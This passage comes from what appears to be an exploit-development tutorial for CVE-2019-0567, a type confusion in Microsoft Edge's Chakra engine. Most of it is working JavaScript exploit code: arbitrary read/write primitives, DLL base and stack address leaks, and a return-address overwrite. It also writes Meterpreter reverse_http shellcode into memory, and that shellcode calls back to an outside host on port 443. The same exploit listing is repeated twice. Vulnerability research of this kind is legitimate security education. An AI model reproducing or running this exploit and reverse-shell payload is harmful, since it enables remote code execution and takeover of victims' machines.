write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000d5ff, );
inc();

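Notice that the last line is missing 4 bytes. The value that is present, 0x0000d5ff, is the low DWORD (the final two shellcode bytes, ff d5, followed by the two NULL bytes the one-liner appended), so it is the high DWORD that is missing. We can fill it with NULL padding (NULL bytes don’t affect us because we aren’t dealing with C-style strings). We need to update our last line as follows:

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000d5ff, 0x00000000);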
inc();

Let’s take just one second to break down why the shellcode is formatted this way. We can see that our write primitive starts writing this shellcode to chakra_base + 0x74b000. If we take a look at this address within WinDbg, we can see it is “empty”.
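
To make the byte order concrete, the sketch below replays the two setUint32 calls that write64 performs, but against a local ArrayBuffer instead of process memory. The buffer and the bytesFor helper are stand-ins for illustration only; the values are taken from the first write64 line above.

```javascript
// Hypothetical helper: show which bytes a (valLo, valHi) pair produces in memory
function bytesFor(valLo, valHi) {
    const view = new DataView(new ArrayBuffer(8));
    view.setUint32(0x0, valLo, true);   // Low DWORD lands at offset 0, little endian
    view.setUint32(0x4, valHi, true);   // High DWORD lands at offset 4, little endian

    const out = [];
    for (let i = 0; i < 8; i++) {
        out.push(view.getUint8(i).toString(16).padStart(2, "0"));
    }
    return out.join(" ");
}

console.log(bytesFor(0xe48348fc, 0x00cce8f0));  // fc 48 83 e4 f0 e8 cc 00
```

The first value ends up at the lower address, so each pair has to be listed in the same order as the shellcode bytes it represents.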

This address comes from the .data section of chakra.dll - meaning it is RW memory that we can write our shellcode to. As we have seen time and time again, the !dh chakra command can be used to see where the different sections are located. Here is how our exploit looks now:

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp object to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x430 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1]);

    // Arbitrary read to get the threadContext pointer (offset 0x5c0)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f8
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()
    {
        countMe+=0x8;
    }

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.16.55.195 LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000d5ff, 0x00000000);
	inc();

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

    // Counter variable
    let counter = 0x6000;

    // Loop
    while (counter != 0)
    {
        // Store the contents of the stack
        tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

        // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
            document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;
        }
        else
        {
            // Decrement the counter
            // This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
            counter -= 0x8;
        }
    }

    // alert() for debugging
    alert("DEBUG");

    // Corrupt the return address to control RIP with 0x4141414141414141
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

As we can clearly see, we use our write primitive to write our shellcode 1 QWORD at a time (this is why we have countMe+=0x8;). Let’s run our exploit the same way we have been doing. When we run this exploit, an alert dialogue should appear just before the stack address is overwritten. When the alert dialogue appears, we can debug the content process (we have already seen how to find this process via Process Hacker, so I won’t continually repeat this).
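
The same pattern can also be written as a loop over an array of DWORD pairs rather than one write64/inc pair per line. The following is a sketch only: writeShellcode is a hypothetical helper, and write64 is passed in as a parameter so the snippet can run outside the exploit with a recording stub in place of the real primitive. The base address values are made up.

```javascript
// Hypothetical helper: write [low, high] DWORD pairs one QWORD at a time
function writeShellcode(write64, baseLo, baseHi, pairs) {
    let offset = 0;
    for (const [valLo, valHi] of pairs) {
        write64(baseLo + offset, baseHi, valLo, valHi);
        offset += 0x8;      // Each write64 call covers 8 bytes, hence the stride
    }
    return offset;          // Total number of bytes written
}

// Stand-in for the real write primitive: record the calls instead of touching memory
const calls = [];
function fakeWrite64(lo, hi, valLo, valHi) {
    calls.push({ lo: lo, hi: hi, valLo: valLo, valHi: valHi });
}

// First two QWORDs of the shellcode from this post; the base values are made up
const written = writeShellcode(fakeWrite64, 0x1000 + 0x74b000, 0x7fff, [
    [0xe48348fc, 0x00cce8f0],
    [0x51410000, 0x51525041]
]);
console.log(written, calls.length);
```

Like the listing above, this sketch adds the offset to the low DWORD of the address only and does not handle a carry into the high DWORD.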

After our exploit has run, we can then examine where our shellcode should have been written to: chakra_base + 0x74b000.

If we cross-reference the disassembly here with the Metasploit Framework, we can see that Metasploit staged payloads use the following stub to start execution.

As we can see, our injected shellcode and the Meterpreter shellcode both start with a cld instruction, which clears the direction flag, and a stack alignment routine which ensures the stack is 16-byte (0x10) aligned (the Windows x64 calling convention, __fastcall, requires this). We can now safely assume our shellcode was written properly to the .data section of chakra.dll within the content process.
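
As a quick illustration of what that alignment step does: the second instruction of the stub (bytes 48 83 e4 f0) is and rsp, 0xFFFFFFFFFFFFFFF0, which clears the low four bits of the stack pointer. The sketch below performs the same arithmetic with BigInt; alignStack is a hypothetical helper and the sample RSP value is made up.

```javascript
// Clear the low 4 bits of a 64-bit stack pointer, as and rsp, 0xFFFFFFFFFFFFFFF0 does
function alignStack(rsp) {
    return rsp & 0xFFFFFFFFFFFFFFF0n;
}

const sampleRsp = 0x000000d5f1bfe8a8n;      // Made-up value for illustration
const aligned = alignStack(sampleRsp);
console.log("0x" + aligned.toString(16));   // 0xd5f1bfe8a0
console.log(aligned % 16n === 0n);          // true
```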

Now that we have our payload, which we will execute at the end of our exploit, we can begin the exploitation process by starting with our “final” ROP chain.

VirtualProtect ROP Chain

Let me caveat this section by saying this ROP chain we are about to develop will not be executed until the end of our exploit. However, it will be a moving part of our exploit going forward so we will go ahead and “knock it out now”.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp object to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x430 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1]);

    // Arbitrary read to get the threadContext pointer (offset 0x5c0)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f8
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()
    {
        countMe+=0x8;
    }

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.16.55.195 LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	inc();
